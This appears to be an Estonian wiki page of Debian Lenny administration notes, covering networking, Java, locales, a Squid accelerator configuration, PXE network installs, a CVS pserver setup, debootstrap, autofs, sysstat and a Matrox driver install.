link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:26 brd ff:ff:ff:ff:ff:ff

====Seadme aadressid====

Aadresside esitamine

# ip address show eth1
3: eth1: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:d3 brd ff:ff:ff:ff:ff:ff
inet 10.0.6.5/24 brd 10.0.6.255 scope global eth1
inet 10.0.6.6/24 brd 10.0.6.255 scope global secondary eth1:1

====Ruuting====

Ruutingute esitamine

# ip route show
10.0.5.0/24 dev eth3 proto kernel scope link src 10.0.5.1
10.0.6.0/24 dev eth0 proto kernel scope link src 10.0.6.1
...

Ruutingu lisamine

# ip route add 192.168.10/24 dev eth0

Ruutingu eemaldamine

# ip route del default via 10.0.14.1 dev eth0

====Misc====

Näited kästudest, mida on ehk ohutu anda töötava masina kasutuses mitte olema võrguseadme suhtes

# ip addr add 100.100.100.4/16 dev eth4
# ip addr del 100.100.100.4/16 dev eth4

nn ifconfig'i aliased

Osade teadlaste arvates on see tänapäeval täiesti igand rääkida ethx:x aliastest. Et lihtsalt saab seadmele omistada mitu aadressi ja kogu lugu. Kui aga on juhtunud selline õnnetu lugu, et seadmel on nt eth0:1 aadress, siis saab seda eemaldada lihtsalt sedasi

# ip addr del 195.80.96.214 dev eth0

===Java kasutamine===

Java ehk JVM (Java Virtual Machine) tarkvara kasutamiseks on Debianis mitmeid võimalusi. Kui on kavatsus jääda paketihaldusest paigaldatud tarkvara kasutamise juurde, siis tõenäoliselt on otstarbekas lasta paketihaldusel töötada ja kasutada Debiani Java pakette. Kui aga kasutatakse mingit eraldiseisvat tarkvara, nt Tomcat, GlassFish vms Java rakendusserverit, siis on ehk otstarbekas kasutada http://java.sun.com/ veebikohast kopeeritud Javat.

====Java kasutamine paketihaldusest====

Debiani Lenny paketihalduses on olemas sellised Java kompilaatorit sisaldavad Java implementatsioonid

$ aptitude search "?provides(java-compiler)"
p gcj - The GNU Java compiler
p gcj-4.2 - The GNU compiler for Java(TM)
p gcj-4.3 - The GNU compiler for Java(TM)
p jikes-classpath - clean room standard Java libraries - wrapper for jikes
p jikes-kaffe - Wrapper for jikes using Kaffe classes
p kaffe-jthreads - A green threads enabled version of the Kaffe VM
p kaffe-pthreads - A POSIX threads enabled version of the Kaffe VM
p sun-java5-jdk - Sun Java(TM) Development Kit (JDK) 5.0
p sun-java6-jdk - Sun Java(TM) Development Kit (JDK) 6

Tarkvara paigaldatakse nagu ikka Debiani pakett ning kasutatakse nagu ikka Javat.

====Sun Java kasutamine====

Sun on Java autor ja üks oluline edasiarendaja, kuid on ka teisi Java implementatsioone. Sun Java saab kasutaja kopeerida aadressilt http://java.sun.com/ kus saab tutvuda ka Java kasutustingimustega.

Sun jagab Javat üsna erinevates pakendustes, kusjuures erinevus on kolmel nö teljel

* millisele funktsionaalsusele on orieteeritud - SE (Standard Edition), EE (Enterprise Edition), ME (Micro Edition)
* kas tegu on arendusvahendi või nö kasutusvahendiga - nt SDK (Software development kit) vs JRE (Java Runtime Environment), viimane sisaldub esimeses
* versiooninumber

Erinevad versioonid 2009 suve seisuga

* 1.3 - vana versioon, mida kasutavad ehk vaid mõned nö riistvaras javat sisaldavad seadmed
* 1.4 - mõned nö legacy rakendustega Tomcat rakendusserverid võiksid seda veel kasutada
* 5 (vahel nimetatakse 1.5) - täiesti veel kasutuses, mõnda rakendust soovitatakse kasutada sellel versioonil
* 6 (vahel nimetatakse 1.6) - viimane stabiilne versioon

Tundub, et juhtumil kui ei ole teada millist Javat kasutada, siis on sobiv valida SE SDK versioon 1.6, mille saab kopeerida http://java.sun.com/ veebikohast liikudes

Downloads -> Java SE -> Java SE Development Kit (JDK 6 Update 16) -> Download

ning täpsustada platvorm, nt

* Linux64 - 64 bit Linux
* Linux - 32 bit Linux

Seejärel valida nimekirjast .bin

File Description Name Size
Java SE Development Kit 6u16 jdk-6u16-linux-x64-rpm.bin 74.04 MB
Java SE Development Kit 6u16 jdk-6u16-linux-x64.bin 78.08 MB

Kasutamiseks tuleb otsustada, millises kataloogis JVM asuma hakkab, olgu see nt /usr/local/java6, selleks tuleb minna juurkasutajana kataloogi /usr/local

# cd /usr/local
# sh jdk-6u16-linux-x64.bin
vastata küsimustele jaatavalt
# ln -s /usr/local/tekkinud-katalooginimi /usr/local/java6

Java kasutamiseks tuleb seada ja kui peetakse vajalikuks, lisada teele

$ export JAVA_HOME=/usr/local/java6
$ export PATH=/usr/local/java6/bin:$PATH

Seejärel saab nt küsida Java versiooni öeldes

$ /usr/local/java6/bin/java -version
java version "1.6.0_16"
Java(TM) SE Runtime Environment (build 1.6.0_16-b01)
Java HotSpot(TM) 64-Bit Server VM (build 11.3-b02, mixed mode)

====Iceweaseli Java lisa====

Iceweaseli ehk Firefox 3.x versiooniga java kasutamiseks on i386 keskkonnas olemas plugin

# apt-get install sun-java5-plugin

või

# apt-get install sun-java6-plugin

===Lokaat===

Lokaatide kasutamiseks tuleb paigalda pakett locales

# apt-get install locales

ning edasiseks seadistamiseks saab öelda, asjakohased seadistusfailid on iseenesest /etc/environment ning /etc/default/locale

# dpkg-reconfigure locales

Süsteemi vaikelokaat võiks olla ehk C serverite puhul, aga see on kasutaja otsustada kuidas ta paremaks peab.

Lokaatide nimekirja esitamiseks tuleb öelda, nt selline võiks olla üsna tüüpiline tulemus

# locale -a
C
POSIX
et_EE.utf8

Kui seadistada lisaks nt ru_RU.utf8 ja fr_FR.utf8, siis saab lugeda vene ja prantsuse keelseid manuaale. Nt öeldes nö tavalises xtermis

$ export LANG=fr_FR.utf8
$ uxterm

mis paistab selline

[[Pilt:Os-debian-kasutamine-1.gif]]

Lisaks töötab nt w3m ja lynx uxterm aknas vene keeles.

===CD plaadi kirjutamine===

Niisama plaadile kirjutamiseks tuleb esmalt moodustada failidest tõmmis öeldes näiteks

# genisoimage -o ../tommis.iso .

ning seejärel kopeerida tõmmis plaadile öeldes

# cdrecord -v speed=10 dev=/dev/cdrom tommis.iso

Kui tegu on RW plaadiga, siis ennem järgmist kirjutamist tuleb plaat puhastada käsuga

# cdrecord -v dev=/dev/cdrom blank=fast

Squeeze puhul

# apt-get install wodim
# wodim -v speed=8 dev=/dev/sr0 tommis.iso

korduvkirjutatava plaadi kustutamiseks

# wodim -v dev=/dev/cdrom blank=fast

===Klaviatuuriasetus konsoolil===

Klaviatuuriasetuse muutmiseks tuleb öelda

# dpkg-reconfigure console-data

ning valida sobiv asetus. NB! Ka mac'i asetus on olemas.

===OpenSSL probleem===

2008 aasta kevadel ilmnes, et Debiani arendajad olid OpenSSL tarkvara pakendamisel tekitanud avalike võtmete genereerimist puudutavas osas vea, mille tõttu osa varasemalt Debian Etch abil tekitatud võtmeid ja sertifikaate on ärakasutatavad. Kas konkreetne sertifikaat on haavatav saab kontrollida programmiga openssl-vulnkey. Esmalt tuleb paigaldada Backportsidest pakett openssl-blacklist ning öelda

# cat sertifikaat.pem | openssl-vulnkey -
COMPROMISED: b3409bf40c63d0d8fc3e1625e9cac2076e20d1e7 -

===Helikaardi kastumine===

Kui helikaart on arvutisse füüsiliselt paigaldatud, siis vajadusel saab SoX tarkvara utiliitide abil kontrollida, kas heli salvestamine mikrofoni abil ja heli taasesitamine töötavad.

Sox tarkvara paigaldamiseks tuleb öelda

# apt-get install sox

Salvestamiseks sobib öelda

# rec -t .wav /tmp/failinimi.wav

Taasesitamiseks sobib öelda

# play /tmp/failinimi.wav

Lisaks on asjakohane kasutada mikserit, nt aumix või alsamixer, just mikrofoni sisselülitamiseks, käivitades xtermi aknas võiks paista selline pilt, vajadusel käivitamisel näidata seadme number, nt

# alsamixer -c 1

[[Pilt:Alsamixer-1.gif]]

kus

* F6 abil saab valida helikaarti, sh virtuaalset (PulseAudio)

===Digifotokaamera kasutamine===

Tänapäeval on levinud nn digitaalsed fotokaamerad, mida saab ühendada arvutiga USB liidese abil selleks, et kopeerida arvutisse fotoaparaadi flash diskile salvestatud pildid. Üks populaarne tarkvara, mis võimaldab suhelda fotokaameraga on gphoto2 http://gphoto.sourceforge.net/.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install gphoto2

Graafiline nö pealisehitus gphoto2 tarkvarale on gtkam, mille paigaldamiseks tuleb öelda

# apt-get install gtkam

Piltide kopeerimiseks tuleb kaamera ühendada arvutiga ning lülitada piltide kopeerimise režiimile, operatsioonisüsteem peaks seejärel USB seadme ära tundma

# lsusb
...
Bus 001 Device 006: ID 04a9:309a Canon, Inc. PowerShot A80
Bus 001 Device 001: ID 0000:0000

Peale gtkam programmi käivitamist peaks gtkam suutma avastada kaamera ning esitama sarnase kasutajaliidese

[[Pilt:Gtkam-1.gif]]

gphoto2 programmi abil saab kaamerat otsekohesemalt juhtida, aga eeldusel, et gtkam või mõni muu programm seda ei kasuta. Nt saab küsida kaamera kohta kokkuvõtet öeldes

# gphoto2 --summary
Camera summary:
Model: Canon PowerShot A80
device version: 01.0001
serial number: (null)
Vendor extension ID: 0x0000000b
Vendor extension description: (null)
...

või kopeerida kõik failid kaamerast failisüsteemi käesolevasse kataloogi

# gphoto2 --get-all-files
Downloading 'IMG_3601.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3601.JPG
Downloading 'IMG_3602.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3602.JPG
..

Android telefonist vms seadmest kopeerimisel on praktiline näidata kataloog, nt Google Nexus 5 nutitelefon puhul

$ gphoto2 --get-all-files -f /store_00010001/DCIM/Camera

Sony Xperia tahvelarvutiga

$ gphoto2 --get-all-files -f /store_00010001/DCIM/100ANDRO

Kui seadme ühendamise ta nö mountitakse, siis võib olla vajalik ta File Manager programmis vms kohal lahti lasta.

===SSH kasutamine===

Kui Debian on juhtumisi paigaldatud Networkless siis puudub vaikimisi openssh-server, selle paigaldamiseks tuleb öelda käsk

# apt-get install openssh-server

Mille järel starditakse server ka automaatselt, kasutaja mureks on vaid sisse logida.

Kui Debian Lenny ssh kliendiga sisselogimine teistesse süsteemidesse on muutunud rahulikuks (nt vana RedHat 4 ES või Solaris 10 ssh serverid oma default väärtustega) ning -v võtmega käivitatud klient ütleb muu seas

debug1: Authentications that can continue: gssapi-keyex,\
gssapi-with-mic,publickey,password,keyboard-interactive
debug1: Next authentication method: gssapi-keyex
debug1: No valid Key exchange context
debug1: Next authentication method: gssapi-with-mic
debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

siis aitab kliendi seadistusfailis, nt /etc/ssh/ssh_config kasutada selliselt seadistatud parameetrit

GSSAPIAuthentication no

===Veebikaamera kasutamine===

Veebikaamera on väike videokaamera, mis tavaliselt ühendatakse arvutiga USB abil ning teda sobib kasutada nt Skype programmi juures enda visuaalseks reaalajas esitlemiseks.

Veebikaamera kasutamise ettevalmistamisel peab peale kaamera arvutiga ühendamist ilmuma USB seadmete nimekirja uus seade, midagi sellist

# lsusb
..
Bus 001 Device 003: ID 046d:092e Logitech, Inc. QuickCam Chat

Selle spca5xx chipsetiga Logitechi QuickCam Chat veebikaamera kasutamiseks tuleb paigaldada Lennile vastav draiver valides sobiva, st oma tuuma platvormile sobiva tuumamooduli, nt

# apt-get install gspca-modules-2.6-686

Lisaks peab see kasutaja, kelle alt Skype programm töötab kuuluma video gruppi, vajadusel tuleb redigeeerida /etc/group faili

# grep video /etc/group
video:x:44:kasutajanimi

Kui kasutaja määrati gruppi kuuluma, siis tuleb korraks süsteemist logida välja ja tagasi sisse, et gruppikuuluvus kehtestuks. Valides seejärel Skype programmi Options peaks olema kaamera kasutamise võimalus olemas

[[Pilt:Veebikaamera-1.gif]]

Veebikaamerat oskavad kasutada lisaks mitmed muud programmid, nt Cheese (gnome komponent), Gqcam.

===Mälukaartide kasutamine===

Nn mälukäärte esineb külluses, need mis ühendatakse arvutile külge USB liidese kaudu, kas otse või nö lugeja abil paistavad operatsioonisüsteemile tavaliselt SCSI seadmena. Seega, kasutamiseks tavaliselt piisab teha kindlaks dmesg väljundi lõpust millise nimega /dev/sdx seade on juurde tekkinud ning monteerida seejärel ta külge, nt

# mount /dev/sdc1 /mnt/malukaart

===Squid v. 3 kasutamine===

Lenny paketihaldusest saab paigaldada Squid v. 3 tarkvara öeldes

# apt-get install squid3

====Kasutamine kiirendina====

Squid3 kiirendina kasutamiseks sobib kasutada sellist seadistusfaili

cache_dir ufs /var/spool/squid3 768 16 256
http_port 10.0.6.249:80 defaultsite=www.siseministeerium.ee vhost
icp_port 0

cache_peer 10.0.6.95 parent 80 0 no-query originserver name=www100695 login=PASS
acl sites_www_100695 dstdomain src "/etc/squid3/sites_www100695.txt"
cache_peer_access www100695 allow sites_www_100695

cache_peer 10.0.6.96 parent 80 0 no-query originserver name=www100696 login=PASS
acl sites_www_100696 dstdomain src "/etc/squid3/sites_www100696.txt"
cache_peer_access www100696 allow sites_www_100696

acl all src 0.0.0.0/0.0.0.0
acl localhost src 127.0.0.1/255.255.255.255 10.0.0.0/255.255.255.0
acl Safe_ports port 80 # http

http_access deny !Safe_ports
http_access allow all

access_log /var/log/squid3/access.log squid
emulate_httpd_log on

===locate andmebaas===

Vaikimisi moodustab Debian updatedb programmi käivitamisel cron'ist nn locate andmebaasi, milles sisaduvad süsteemis leiduvate failid nimed. Seda andmebaasi saab kasutada nt selliselt

# locate .bash_history
/root/.bash_history
/srv/backup/500g-vint/home/mart/.bash_history

locate andmebaas võib osutuda mitmel juhul ebasoovitavaks

* andmebaasi salvestatakse andmed, mis seal ei peaks sisalduma; nt kui veebiserveri kasutajana saab käivitada programme, siis annab see baas ilmselt soovimatut lisainfot kasutajale ühe või teise faili olemasolust ja asukohast failisüsteemis
* locale andmebaasi moodustatakse väga suure mahuga andmetest iga päev uuesti ning see raiskab ilmselt ressurssi

updatedb programm käivitatakse skripti

/etc/cron.daily/mlocate

abil ning updatedb tööd saab kontrollida seadistusfaili abil, eriti, milliseid katalooge andmebaasi koostamisel kasutatakse

/etc/updatedb.conf

===Operatsioonisüsteemi paigaldamine võrgust===

Operatsioonisüsteemi võrgust paigaldamine eeldab arusaadavalt paigaldamise ajal võrguühenduse olemasolu, soovitavalt nö hea ühenduse olemasolu. Debian Lenny operatsioonisüsteemi saab paigaldada võrgust kolmel viisil

* business card CD tõmmis (ca 40 MB) - sisaldab tuuma ja installerit
* minimaalse sisu CD tõmmis (ca 180 MB) - sisaldab tuuma, installerit ning minimaalset hulka pakette
* TFTP serverilt paigaldamine - tuuma ja ramdisk booditakse TFTP serverilt

Vaatamata sellele kui palju kasutati kohalikku abi, st lokaalset meediat või TFTP serverit toimub süsteemi mahukama osa moodustava tarkvara kopeerimine paigaldamise ajal võrgust.

Võrgust paigaldamine võiks eriti sobida üle IBM IMM ja HP iLO liideste tarvkara paigaldamisel.

====Paigaldamine TFTP serverilt====

Üks võimalus Debiani paigaldada on täiesti ilma lokaalse meediate st võrgust, kuid eeldusel, et arvuti omab PXE võimelist võrgukaarti.

Selleks tuleb kopeerida aadressilt tftp serveris kasutamiseks ettevalmistatud kataloogi sisu

# wget -np -r http://ftp.nl.debian.org/debian/dists/lenny/main/installer-i386/current/images/netboot/debian-installer/i386/

ning paigutada lokaalvõrgus asuvasse tftp serverisse, nt kataloogi /tftpbood

# find /tftpboot
/tftpboot
/tftpboot/debian-installer
/tftpboot/debian-installer/i386
/tftpboot/debian-installer/i386/boot-screens
/tftpboot/debian-installer/i386/boot-screens/exithelp.cfg
/tftpboot/debian-installer/i386/boot-screens/adtxt.cfg
/tftpboot/debian-installer/i386/boot-screens/index.html
/tftpboot/debian-installer/i386/boot-screens/f1.txt
/tftpboot/debian-installer/i386/boot-screens/f10.txt
/tftpboot/debian-installer/i386/boot-screens/f2.txt
/tftpboot/debian-installer/i386/boot-screens/f3.txt
/tftpboot/debian-installer/i386/boot-screens/f4.txt
/tftpboot/debian-installer/i386/boot-screens/f5.txt
/tftpboot/debian-installer/i386/boot-screens/f6.txt
/tftpboot/debian-installer/i386/boot-screens/f7.txt
/tftpboot/debian-installer/i386/boot-screens/f8.txt
/tftpboot/debian-installer/i386/boot-screens/f9.txt
/tftpboot/debian-installer/i386/boot-screens/syslinux.cfg
/tftpboot/debian-installer/i386/boot-screens/menu.cfg
/tftpboot/debian-installer/i386/boot-screens/prompt.cfg
/tftpboot/debian-installer/i386/boot-screens/splash.png
/tftpboot/debian-installer/i386/boot-screens/stdmenu.cfg
/tftpboot/debian-installer/i386/boot-screens/vesamenu.c32
/tftpboot/debian-installer/i386/boot-screens/txt.cfg
/tftpboot/debian-installer/i386/index.html
/tftpboot/debian-installer/i386/initrd.gz
/tftpboot/debian-installer/i386/linux
/tftpboot/pxelinux.0
/tftpboot/pxelinux.cfg
/tftpboot/pxelinux.cfg/index.html
/tftpboot/pxelinux.cfg/default

Lisaks tuleb valmistada ette sobivalt dchp server, nt sellise host kirjeldusega, next-server 192.168.1.254 on tftpd server

host fuji.auul {
hardware ethernet 00:17:42:02:0b:8a;
fixed-address 192.168.1.142;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
filename "pxelinux.0";
next-server 192.168.1.254;
option domain-name-servers 192.168.1.254;
}

Tulemusena peab installeeritav arvuti saama dhcp serverilt omale võrguseaded, alglaadima tftp serverilt operatsioonisüsteemi ning käivitama installeri. Edasine paigaldamine toimub tavapärasel viisil, kusjuures installer küsib Debiani peegel-serveri asukohta, millelt kopeeritakse tarkvara.

===CVS tarkvara kasutamine===

CVS tarkvara saab kasutada mitmel moel, antud juhul on tegemist selliste asjaoludega

* CVS töötab nn pserver rezhiimis, mis tähendab, et teenus kuulab 2401 pordil ja liiklus on krüptimata
* CVS liiklust tuleb täiendavate CVS väliste vahenditega turvata, nt OpenVPN või Stunnel
* CVS tarkvara tegeleb ise oma kasutajatega, st operatsioonisüsteemi kasutajatest eraldi
* saab kasutada mitmeid hoidlaid (ingl. k. repository)
* failisüsteemi kasutamine hoidla operatsioonisüsteemi seisukohalt toimub iga hoidla puhul hoidlale vastava kasutajaga (mitte hoidlat kasutava cvs kasutajana)

Antud juhul kasutatakse mitmeid Debiani haldajate poolt nn vanilla CVS tarkvarale juurde lisatud täiendusi, mille kasutamist on kirjeldatud failis /usr/share/doc/cvs/README.Debian.gz.

Paigaldamiseks tuleb öelda

# apt-get install cvs

ning valida kas kasutatakse pserverit või mitte, antud juhul kasutatakse ja seejuures tuleb järgnevalt määrata, millistes kataloogides asuvad repositooriumid, nt

/srv/cvs-loomaaed
/srv/cvs-propaganda

CVS tarkvara juhivad serveri poolel sellised seadistusfaili

* CVS p-serveri seadistusfailis /etc/cvs-pserver.conf sisalduvad muu seas repositooriumide asukohad failisüsteemis ning kasutate paroolifail

CVS_PSERV_REPOS="/data/cvs-loomaaed:/data/cvs-propaganda"
CVS_PSERV_LIMIT_MEM=hard
CVS_PSERV_LIMIT_DATA=hard
CVS_PSERV_LIMIT_CORE=0
CVS_PSERV_LIMIT_CPU=hard
CVS_EXT_PASSWD_FILE=/etc/cvs-passwd

* inetd või xinetd kasutamisel vastavalt seadistusfailis /etc/inetd.conf peab sisalduma rida

cvspserver stream tcp nowait root /usr/sbin/tcpd /usr/sbin/cvs-pserver

või fail /etc/xinetd.d/cvs sisuga

service cvspserver
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/cvs-pserver
}

* repostitooriumide failide omanikud ja efektiivsed kasutajad failis on kirjeldatud /etc/cvs-repouids

/srv/cvs-loomaaed:cvs-loomaaed
/srv/cvs-propaganda:cvs-propaganda

Repositooriumide initsialiseerimiseks tuleb öelda

# su - cvs-loomaaed
$ cvs -d /srv/cvs-loomaaed init
# su - cvs-propaganda
$ cvs -d /srv/cvs-propaganda init

Paroolifaili /etc/cvs-passwd formaat on selline

/data/cvs-loomaaed
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.
/data/cvs-propaganda
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.

Projektid tuleb alguses hoidlasse importida vastavate kasutajatega

# su - cvs-loomaaed
$ cd /data/tmp/portaal-arendus
cvs-loomaaed$ cvs -d /data/cvs-loomaaed import -m "Loomaaia portaali arendus algab" portaal-arendus vt rt
# su - cvs-propaganada
$ cd /data/tmp/portaal-propaganda
cvs-propaganda$ cvs -d /data/cvs-propaganda import -m "Loomaaia propaganda algab" propaganada vt rt

====Moodulite kirjeldamine====

CVS all olevast projektist saab kopeerida ka üksikuid katalooge öeldes

$ cvs co projektinimi/katalooginimi

====Kasutamine Linuxi CVS kliendiga====

$ export CVSROOT=:pserver:kasutajanimi@cvs.loomaaed.tartu.ee:/data/cvs-loomaaed
$ cvs login
$ cvs co portaal-arendus
$ cvs logout

====Kasutamine Windowsi TortoiseCVS kliendiga====

[[Pilt:Tortoisecvs-1.gif]]

===Riistvara omadustega tegelevad utiliidid===

* lshw - esitab suhteliselt põhjaliku väljundi arvutisüsteemi riistvaralistest komponentidest, nt sellise

# apt-get install lshw

* ethtool

# apt-get install ethtool

===Debootstrap programmi kasutamine===

debootstrap programmiga saab näidatud kataloogi moodustada operatsioonisteemi juurfailisüsteemi

# debootstrap lenny /srv/lenny-chroot http://ftp.aso.ee/debian

Nt sobib seda kasutada töötava operatsioonisüsteemi sees olles multiboot arvuti moodustamiseks. Sel juhul tuleb Debian Lenny puhul lisaks tähele panna selliseid asjaolusid peale seda kui debootstrap on töö lõpetanud

* moodustada /etc/fstab sisu
* seadistada /etc/network/interfaces ja /etc/hosts
* kopeerida /lib/modules alla tuuma moodulid
* paigaldada udev, lvm2, vlan, firmware-bnx2, bridge-utils ja openssh-server tarkvara (ja muu oluline)
* kirjutada /etc/shadow faili juurkasutajale parool (konsoolilt saab küll login: root järel enterit öeldes sisse ka ilma paroolita)
* kopeerida tuum ja iniramfs /boot kataloogi
* paigaldada alglaadur (nt grub-install abil)
* seadistada ajavöönd, /etc/localtime link

Kui selliselt moodustatud keskkonda chrootida, siis üldiselt peaks olema eelnevalt ühendatud külge sellised failisüsteemid, eeldusel, et keskkond asub kataloogis /target

/dev/sda1 on /target/boot type ext3 (rw,noatime,errors=continue,data=ordered)
proc on /target/proc type proc (rw)
sysfs on /target/sys type sysfs (rw)
udev on /target/dev type tmpfs (rw,size=10240k,mode=755)
devpts on /target/dev/pts type devpts (rw,mode=600)

öeldes

# mount -t proc /proc /srv/lenny-32/proc
# mount -t devpts devpts /srv/lenny-32/dev/pts

debootstrap abil saab tekitada ka teisele arhitektuurile vastav failisüsteem, nt öeldes amd64 keskkonnas

# debootstrap --arch=i386 lenny /srv/lenny-32 http://ftp.aso.ee/debian

Uuemal ajal soovitatakse kasutada tarkvara multistrap.

===Autofs===

Selleks, et failisüsteem monteeritaks külge automaatselt vastava ühenduspunkti poole pöördumisel, sobib kasutada tarkvara autofs. Tarkvara paigaldamiseks tuleb öelda

# apt-get install autofs

Tarkvara kasutamiseks tuleb näidata seadistusfailis /etc/auto.master nn map failide asukohad, nt

# cat /etc/auto.master
/var/autofs /etc/auto.misc --timeout=60

kusjuures map failis /etc/auto.misc on kirjeldatud konkreetsed ressursid, nt

# cat /etc/auto.misc
cd -fstype=iso9660,ro,nosuid,nodev :/dev/cdrom
removable -fstype=ext3,ro :/dev/mapper/mpath3

Kui nüüd öelda muidu tühjas kataloogis /var/autofs 'ls -l', siis ühendatakse failisüsteem külge ning seejärel täidetakse ls käsk, nt

# cd /var/autofs/removable
drwx------ 2 root root 16384 Apr 11 14:13 lost+found

Ühendatud failisüsteemide parameetreid näeb nii

# mount | grep autofs
automount(pid7544) on /var/autofs type autofs (rw,fd=4,pgrp=7544,minproto=2,maxproto=4)
/dev/mapper/mpath3 on /var/autofs/removable type ext3 (ro)

Autofs olekut näeb öeldes

# /etc/init.d/autofs status
Configured Mount Points:
------------------------
/usr/sbin/automount --timeout=300 /home file /etc/auto.home

Active Mount Points:
--------------------
/usr/sbin/automount --pid-file=/var/run/autofs/_home.pid --timeout=300 /home file /etc/auto.home

====NFS ressursi ühendamine====

Nt kasutajate kodukataloogide üle NFS ühendamiseks tuleb kirjeldada nt selline /etc/auto.home fail

# cat /etc/auto.home
kernel -ro,soft,intr 192.168.10.249:/data/export

===Süsteemi ressursikasutuse jälgimine===

Pakett sysstat http://pagesperso-orange.fr/sebastien.godard/ sisaldab süsteemi ressurssikasutuse jälgimiseks vajalikke vahendeid, nii reaalajas kui taustal andmete kogumiseks

* reaalajas - iostat, pidstat, mpstat
* taustal - sa1, sa2, sar

Tarkvara käivitamist ja töötamist juhivad seadistusfailid

/etc/cron.d/sysstat
/etc/cron.daily/sysstat
/etc/default/sysstat

Taustal töötava sysstat töö tulemusena kogutakse andmed ja salvestatakse binaarses formaadis kataloogi /var/log/sysstat. Kogutud andmeid saab esitada nt selliselt

# sar -A -f /var/log/sysstat/sa22 | less

Eraldi mainimist vajab programm pidstat, mille abil saab jälgida üksiku protsessiga seotud ressursikasutust, nt plokkseadme IO'd

$ pidstat -d -p 15585 2
Linux 2.6.26-1-xen-amd64 (moraal.auul) 04/22/09 _x86_64_

20:13:28 PID kB_rd/s kB_wr/s kB_ccwr/s Command
20:13:30 15585 0.00 236.82 0.00 wget
20:13:32 15585 0.00 238.00 0.00 wget
20:13:34 15585 0.00 236.82 0.00 wget
20:13:36 15585 0.00 238.00 0.00 wget

Kõigi kasutaja postgres protsesside io'd saab uurida nt selliselt

$ pidstat -d -p ALL 2 | grep postgres

===Matrox P690 videokaardi kasutamine===

Matrox http://www.matrox.com/ valmistab suhteliselt eeskujulikke videokaarte. P690 mudeli kasutamiseks sobib kasutada aadressil http://www.matrox.com/graphics/en/products/graphics_cards/p_series/p690pci/ kopeeritud draiverit. Lisaks asub nö community-forum aadressil http://forum.tuxx-home.at/ ning sealsed entusiastid avaldavad oma parandustega draivereid.

====Paigaldamine====

# CC=/usr/bin/gcc-4.1 sh mtxdriver-installer-x86_32-cvs-20090511.run
..
Please, enter the directory to extract the files [/root/] /usr/src/mtx
Creating directory /usr/src/mtx/matroxdriver-x86_32-cvs-20090511
Verifying archive integrity... All good.
Uncompressing Matrox Parhelia Driver.
..
========================================
Matrox Linux Driver Install Script
========================================

Installation package v1.4.7

Refreshing ld database
Installing mtx_drv.so ...
Installing v4l_drv.so ...
Messages are being logged in file /tmp/make.log,
this might take some time.

Compiling mtx.ko ... done

Installing mtx.ko ...
Backing up libGL
Installing 32bits OpenGL library file to /usr/lib
Installing libGL.so.1.3.0 ...
Installing the GLX library file to /usr/lib/xorg/modules/extensions

Installing libglx.so ...
Installing the gl.h header file to /usr/include/GL

Installing gl.h ...
Installing the glext.h header file to /usr/include/GL

Installing glext.h ...
Installing the glx.h header file to /usr/include/GL

Installing glx.h ...
Updating library cache

Installing documentation

cp: cannot stat `v4l': No such file or directory
Installing powerdesk

Installing mtxcards ...
Installing mtxwizard ...
Installing matroxconfig ...
Installing libmtxcfg.so ...

Do you wish to let the installer setup your X config file (y/n)? y

Trying to configure your X config file (/etc/X11/xorg.conf)

Installation finished

Tulemusena on

* moodustatud nö vaikimisi /etc/X11/xorg.conf seadistusfail
* seadistusutiliit /usr/bin/matroxconfig
* kataloogi /usr/share/matrox on paigutatud teeke ja tekste
* kompileeritud ja paigaldatud tuuma moodul mtx.ko, mis on link /usr/share/matrox kataloogi failile

# find /lib/modules/2.6.26-2-686 -name mtx.ko -ls
721274 0 lrwxrwxrwx 1 root root 32 Aug 8 17:44 \
/lib/modules/2.6.26-2-686/kernel/drivers/video/mtx.ko -> /usr/share/matrox/current/mtx.ko

Süsteemi on lisatud/asendatud sellised failid

/usr/bin
/usr/bin/mtxwizard
/usr/bin/matroxconfig
/usr/share
/usr/share/mtxwizard
/usr/share/mtxwizard/mtxcards
/usr/share/matrox
/usr/share/matrox/samples
/usr/share/matrox/samples/XF86Config.QID_Quad_Hybrid
/usr/share/matrox/samples/XF86Config.QID_Quad_Merge
/usr/share/matrox/samples/XF86Config.triple
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_1
/usr/share/matrox/samples/XF86Config.T221-Merged
/usr/share/matrox/samples/XF86Config.merged
/usr/share/matrox/samples/XF86Config.dual
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_2
/usr/share/matrox/samples/XF86Config.single
/usr/share/matrox/samples/XF86Config.triple_merged
/usr/share/matrox/samples/XF86Config.T221-Xinerama
/usr/share/matrox/current
/usr/share/matrox/current/gl.h
/usr/share/matrox/current/libmtxcfg.so
/usr/share/matrox/current/mtxcards
/usr/share/matrox/current/mtx_drv.so
/usr/share/matrox/current/glx.h
/usr/share/matrox/current/glext.h
/usr/share/matrox/current/mtx.ko
/usr/share/matrox/current/v4l_drv.so
/usr/share/matrox/current/mtxwizard
/usr/share/matrox/current/libGL.so.1.3.0
/usr/share/matrox/current/matroxconfig
/usr/share/matrox/current/libglx.so
/usr/share/matrox/backup
/usr/share/matrox/docs
/usr/share/matrox/docs/readme.txt
/usr/share/matrox/docs/readme-advanced.txt
/usr/lib
/usr/lib/libGL.so.1.3.0
/usr/lib/libGL.so
/usr/lib/xorg/modules/extensions
/usr/lib/xorg/modules/extensions/libmtxcfg.so
/usr/lib/xorg/modules/extensions/libglx.so
/usr/lib/xorg/modules/drivers
/usr/lib/xorg/modules/drivers/mtx_drv.so
/usr/lib/xorg/modules/drivers/v4l_drv.so
/usr/lib/libGL.so.1
/usr/src/mtx
/usr/src/mtx/log
/usr/include/GL
/usr/include/GL/gl.h
/usr/include/GL/glx.h
/usr/include/GL/glext.h

Tuuma laadimisel öeldakse

# modprobe mtx
mtx: module license 'Copyright (c) 2002, 2004, Matrox Graphics Inc.' taints kernel.
